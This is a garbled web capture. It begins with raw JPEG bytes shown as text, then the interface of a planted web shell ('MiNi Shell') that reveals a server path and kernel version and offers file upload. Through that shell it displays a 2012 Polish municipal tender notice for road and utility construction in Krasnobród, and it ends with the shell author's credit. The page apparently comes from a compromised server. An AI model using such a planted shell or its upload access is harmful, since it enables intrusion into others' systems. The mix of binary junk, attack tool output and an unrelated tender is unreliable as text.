JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120329/98308-N-2012.html

<p class="kh_header"><b>Krasnobród: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej</b><br>
<b>Numer ogłoszenia: 98308 - 2012; data zamieszczenia: 29.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krasnobród , ul. 3 Maja 36, 22-440 Krasnobród, woj. lubelskie, tel. 0-84 660 7691, faks 0-84 660 7692.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnobrod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Przebudowa drogi gminnej nr 110871L (ul. Wczasowa) w Krasnobrodzie od  km 0+319,00 do km 1+041,00 o długości 722,00m. 
Zakres robót budowlanych branży drogowej w ulicy Wczasowej:
-Roboty przygotowawcze (usuniecie warstwy ziemi urodzajnej o grubości 15cm - 6304,00m2, rozebranie nawierzchni z asfaltu 1308m2, rozebranie chodnika z kostki brukowej - 246,3m2, rozebranie obrzeży trawnikowych -166m, wykonanie przepustów pod drogą z rury dwudzielnej HDPE 110mm - 22,00m)
-roboty ziemne (roboty ziemne 1567m3, wykopy oraz przekopy głębokości do 3m  321m3)
-roboty odwodnieniowe (wykopy oraz przekopy głębokości do 3 m - 92m3, budowa przepustów drogowych jednootworowych z rur o śr. 60cm -7,00m,  przepusty drogowe rurowe jedootworowe z rur o śr. 80cm - 17,00m, obudowy wlotów przepustów drogowych fi 60 - 3,400m3, studzienki ściekowe uliczne betonowe o średnicy 500mm - 3,00szt.). 
-podbudowy (wykonanie koryta gł. 20cm pod zjazdy -481,4m2, zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni - 3875,00m2, wzmocnienie podłoża pod chodnik i ścieżkę rowerową z gruntu stabilizowanego cementem warstwa gr.10cm - 2267,30m2, wzmocnienie podłoża z gruntu stabilizowanego cementem pod drogę i zjazdy - 1607,5m2, warstwa podbudowy z kruszywa łamanego grubości 20cm - 1126,10m2, wzmocnienie i wyrównanie istniejącej nawierzchni kruszywem łamanym - 201,65m3, podbudowa z kruszywa łamanego pod zjazdy i ścieżkę rowerową grubość warstwy 15cm - 597,34m2, skropienie emulsją warstwy podbudowy i wiążącej - 1936 m2)
-nawierzchnia (nawierzchnie z mieszanek mineralno-asfaltowych warstwa wiążąca gr. 4cm - 967,70m2, nawierzchnie z mieszanek mineralno-asfaltowych warstwa ścieralna -4cm - 967,70m2, nawierzchni ścieżki rowerowej z kostki brukowej betonowej gr.8cm - 1388,20m2, nawierzchnia drogi, parkingów i zjazdów z kostki brukowej gr.8cm - 1558,70m2)   
-roboty wykończeniowe (obsianie skarp - 3411m2, przepusty rurowe fi 60 cm  pod zjazdem - 8,00m zakończenia kołnierzowe - 2,6m, ubezpieczenia płytami ażurowymi typu krata -  41,60m2, umocnienie dna rowu płytą betonową korytkową - 26,00m.
-Urządzenia bezpieczeństwa ruchu (słupki do znaków drogowych z rur stalowych - 28szt, znaki drogowe o pow. do 0,3m2 - 46,00 szt., oznakowanie poziome jezdni farbą chlorokauczukową - 69,80m2).      
-Elementy ulic (krawężniki betonowe na ławie betonowej - 1195,50m, obrzeża betonowe gr 6cm - 2514,20m, obrzeża betonowe gr. 8cm-363,90m, chodniki z kostki brukowej gr. 6cm - 994,800m2)
Przebudowa sieci wodociągowej w ulicy Wczasowej 
Zakres robót budowlanych branży sanitarnej:
- Roboty ziemne (wykopy oraz przekopy - 646,1m3, wykopy liniowe -121,5m3,):
- Roboty instalacyjne (rurociągi z PCW dz  160mm - 365m, dz 90 - 130m, uzbrojenie sieci: hydrant p. pożarowy nadziemny dn 80 - 4 szt., zasuwa żeliwna wodna Kołnierzowa dn 150 - 3 szt, dn 80 - 11 szt. kołnierzowe, rury osłonowe dz 273 - 10m, dz 168 - 6m) 
Budowa oświetlenia ulicznego przy ulicy Wczasowej 
Zakres robót budowlanych branży elektrycznej: 
- Linia kablowa oświetlenia ulicznego (ułożenie rur osłonowych PVC do fi 140mm - 111m, ułożenie kabli YAKY 4X35mm2  w rowach kablowych, tunelach, rurach  - 706m, montaż latarń oświetleniowych -18 kpl., montaż opraw oświetlenia zewnętrznego na słupach-18 szt., montaż przewodów do opraw oświetleniowych - 18 kpl, montaż szafy oświetlenia zewnętrznego - 1 szt.,     
Budowa drogi gminnej nr 110 868L relacji droga powiatowa nr 3261L Krasnobrod - Łasochy - droga powiatowa nr 2949L Krasnobród - Długi Kąt (ul. Sosnowa w Krasnobrodzie), w km 0+000,00 do km 0+618,80.
Zakres robót budowlanych branży drogowej w ulicy Sosnowej:
-roboty przygotowawcze (usuniecie warstwy ziemi urodzajnej o grubości do 15cm - 2651,00m2, rozebranie nawierzchni z kostki brukowej - 24,00m2, przestawienie ogrodzenia z prefabrykowanych elementów żelbetowych - 132mm2, przestawienie ogrodzenia z siatki na słupkach stalowych - 95,00m, przestawienie ogrodzeń drewnianych - 180m2).
-roboty ziemne (roboty ziemne 1587, wykopy oraz przekopy głębokości do 3,00m - 226m3)
-roboty odwodnieniowe (regulacja pionowa studzienek sanitarnych i wodociągowych - 22,00szt.). 
-podbudowy (koryta głębokości do 30 cm pod zjazdy i drogi boczne - 430,50m2, profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni - 4645,40m2, wzmocnienie podłoża pod chodnik z gruntu stabilizowanego cementem warstwa gr. 10cm - 882,20m2, wzmocnienie podłoża pod chodnik z gruntu stabilizowanego cementem warstwa gr. 10cm - 882,20m2, wzmocnienie podłoża z kruszywa stabilizowanego cementem warstwa gr. 10cm, droga i zjazdy - 3728,20m2, warstwa podbudowy z kruszywa łamanego, grubość warstwy 20 cm - 3519,40m2, podbudowa z kruszywa łamanego pod zjazdy grubość warstwy 15cm - 208,80m2).
-nawierzchnia (roboty remontowe frezowanie nawierzchni bitumicznej o gr. 7cm  - 35,00m2, nawierzchnia drogi i zjazdów z kostki brukowej betonowej grubości 8cm - 3763,20m2)
-roboty wykończeniowe (obsianie skarp - 1207,20m2) 
-urządzenia bezpieczeństwa ruchu (słupki do znaków drogowych z rur stalowych - 20,00szt., pionowe znaki drogowe o powierzchni do 0,3m2 - 20,00szt., znak aktywny przejścia dla pieszych - 2 szt. oznakowanie poziome jezdni farbą chlorokauczukową - 52,00m2)
-elementy ulic (krawężniki betonowe na ławie betonowej z oporem - 1304,40m, obrzeża betonowe gr. 6cm - 611,90m, obrzeża betonowe gr. 8cm - 237,60m, chodniki z kostki brukowej betonowej gr. 6 cm - 881,20m2)
2) Budowa kolektora burzowego w ulicy Sosnowej i Lelewela. 
 Zakres robót budowlanych branży sanitarnej: 
-Kolektor burzowy w ulicy Sosnowej (wykopy z zasypaniem w ścianach zabezpieczonych obudową - 751 m3, roboty ziemne - 147m3, zagęszczenie nasypów ubijakami mechanicznymi - 751m3, wykopy jamiste wykonywane koparkami -65,6m3, kanały z rur polietylenowych o śr. 500mm - 227m, studnie rewizyjne betonowe o średnicyo1000mm - 6 szt. układanie mieszanki betonowej pompą do betonu na samochodzie - 115m3, studzienki ściekowe uliczne betonowe o śr. 500 mm z osadnikiem bez syfonu - 23 szt., kanały z rur PVC łączonych na wcisk o śr. 160mm - 58,8m).     
-Kanał burzowy w ulicy Lelewela (roboty remontowe - ciecie piłą nawierzchni bitumicznych - 265,20, mechaniczna rozbiórka nawierzchni bitumicznej o gr. 4 cm oraz podbudowy z kruszywa- 162,50m2, roboty ziemne - wykopy z zasypaniem o ścianach zabezpieczonych obudową - 633,00m3, wykopy jamiste o głębokości  do 3,0m - 23,10m3, zagęszczanie nasypów - 251,10m3, kanały z rur polietylenowych o średnicy 600mm - 278,00m, studnie rewizyjne z kręgów betonowych o średnicy 1200mm - 5 studni, kanały z rur PVC o średnicy 160mm, - 18,100m, studzienki ściekowe uliczne o średnicy o 500mm - 6 szt., warstwa podbudowy z kruszyw łamanych gr. 15 cm - 265,20m2,   warstwa podbudowy z kruszyw łamanych gr. 10 cm - 265,20m2, nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych warstwa wiążąca i ścieralna - 265,20m2)  
-Modernizacja istniejącego wpustu deszczowego w ul. Kościuszki (odmulenie istniejącego rowu melioracyjnego - 50m, wykonanie kolektora PEHD DN  600m w miejsce istniejącego niedrożnego - 20m, studnia połączeniowa DN 1200mm z osadnikiem - 1,00 szt. wykonanie nowych wpustów deszczowych DN 500 - 2 szt., wylot betonowy do rowu - 1 szt.) 
3)Budowa kanalizacji teletechnicznej w ulicy Sosnowej w Krasnobrodzie. 
Zakres robót budowlanych branży teletechnicznej: 
-  Budowa kanalizacji teletechnicznej (budowa kanalizacji kablowej pierwotnej z rur z tworzyw sztucznych - 605m, budowa studni kablowych prefabrykowanych - 7 szt.,  montaż elementów mechanicznej ochrony przed ingerencją osób nieuprawnionych w istniejących studniach kablowych - 7 szt.)
Przebudowa sieci telekomunikacyjnej w związku z budową drogi gminnej nr 110 868L relacji droga powiatowa 3261L Krasnobród - Łasochy - droga powiatowa 2949L Krasnobród - Długi Kąt (ulica Sosnowa w Krasnobrodzie) od km 0+000,00 - do km 0+618,60. 
Zakres robót budowlanych branży teletechnicznej:
-Budowa kanalizacji teletechnicznej (budowa kanalizacji kablowej pierwotnej z rur z tworzyw sztucznych - 10m, wykonanie przepustów pod drogami z wciąganiem rur przepustowych -17m, budowa studni kablowych prefabrykowanych rozdzielczych dwuelementowych - 3 szt., wciągnięcie kabla wypełnionego w powłoce termoplastycznej do kanalizacji kablowej - 27,0m,  montaż skrzynki słupowej - 3 szt., montaż słupów bliźniaczych z jedną belką ustrojową - 1 szt., przestawienie słupów pojedynczych w szczudłach betonowych - 5 szt., zdemontowanie słupów bliźniaczych żelbetowych - 1 szt., zawieszanie kabli nadziemnych na podbudowie słupowej- 438m)
-Przebudowa kabla światłowodowego (ręczne wciągnięcie rur kanalizacji wtórnej - 27,0m, wyciągnięcie kabla w powłoce termoplastycznej - 92,0m, wciągniecie kabli światłowodowych do kanalizacji wtórnej z rur HDPE - 0,091 km ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.10.00-8, 45.11.20.00-5, 45.22.33.00-9, 45.23.31.62-2, 45.23.10.00-5, 34.92.85.30-2, 45.23.13.00-8, 45.23.32.22-1, 45.23.23.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 10 000,00 zł. (słownie: dziesięć tysięcy złotych 00/100 )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (zakończył), jako wykonawca lub podwykonawca, co najmniej 1 zamówienie  polegający na budowie, przebudowie lub remoncie drogi klasy co najmniej L o wartości robót nie mniejszej niż 2 000 000,00 PLN (brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferta oraz kosztorys ofertowy wg wzorów załączonych do specyfikacji istotnych warunków zamówienia.
2. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii.
2. Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian w umowie:
1)	Zmiana w zakresie wysokości wynagrodzenia, związana ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
2)	Zmiana terminów określonych w niniejszej umowie pod warunkiem, że zmiana będzie wynikała z przyczyn leżących po stronie Zamawiającego,
3)	Zmiana w zakresie materiałów użytych do realizacji przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zaprzestania produkcji danego asortymentu, zmiany przepisów prawa bądź ujawnienia na etapie realizacji robót odstępstw założeń przyjętych w dokumentacji projektowej w stosunku do rzeczywiście odkrytych na placu budowy istniejących elementów budowli, budynków lub instalacji,
4)	Zmiana osób wykonujących zamówienie, pod warunkiem, że zmiana będzie wynikała z odrębnych przepisów w tym rozwiązania bądź wygaśnięcia umowy, utraty wymaganych uprawnień lub zdarzeń losowych uniemożliwiających świadczenie pracy,
5)	Zmiana wprowadzająca rozwiązania zamienne (roboty zamienne) pod warunkiem, że będzie to skutkowało ulepszeniem realizacji zamówienia, usprawnieniem procesu budowy bądź koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych, 
6)	Zmiana terminu wynikająca z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy takich jak:
a.	wystąpienia siły wyższej  w rozumieniu przepisów Kodeksu cywilnego
b.	wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót, Przez warunki niesprzyjające należy rozumieć ciągłe opady deszczu utrzymujące  przez okres co najmniej jednego miesiąca w trakcie okresu przewidzianego na realizację przedmiotu zamówienia. W przypadku zaistnienia takiej okoliczności obowiązek  przedłożenia Zamawiającemu stosownych dokumentów potwierdzających  zaistnienie niekorzystnych warunków atmosferycznych w trakcie trwania kontraktu spoczywa na Wykonawcy. 
c.	wystąpienia robót dodatkowych (nieprzewidzianych) bezpośrednio wpływających na wydłużenie realizacji robót podstawowych.
d.	wystąpienia konieczności zatrzymania robót w przypadku natrafienia na znaleziska archeologiczne i konieczności ich zabezpieczenia i zbadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasnobrod.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Krasnobród ul. 3 Maja 36, 22-400 Krasnobród, pok. nr 13 sekretariat opłata 50 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2012 godzina 10:00, miejsce: Oferty winny być złożone w siedzibie Zamawiającego w Krasnobrodzie przy ul. 3 Maja 36, sekretariat pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt  jest dofinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego Oś priorytetowa V TRANSPORT działanie 5.2. Lokalny układ transportowy.
2. Projekt pod nazwą: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej o numerze   02/08-WND-RPLU.05.02.00-06-152/08  realizowany jest na podstawie umowy z dnia 03.02.2012 r.  nr 02/08-UDA-RPLU.05.02.00-06-152/08-00-0579  zawartej pomiędzy Województwem Lubelskim a Gminą Krasnobród, 22-440 Krasnobród, ul. 3 Maja 36..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com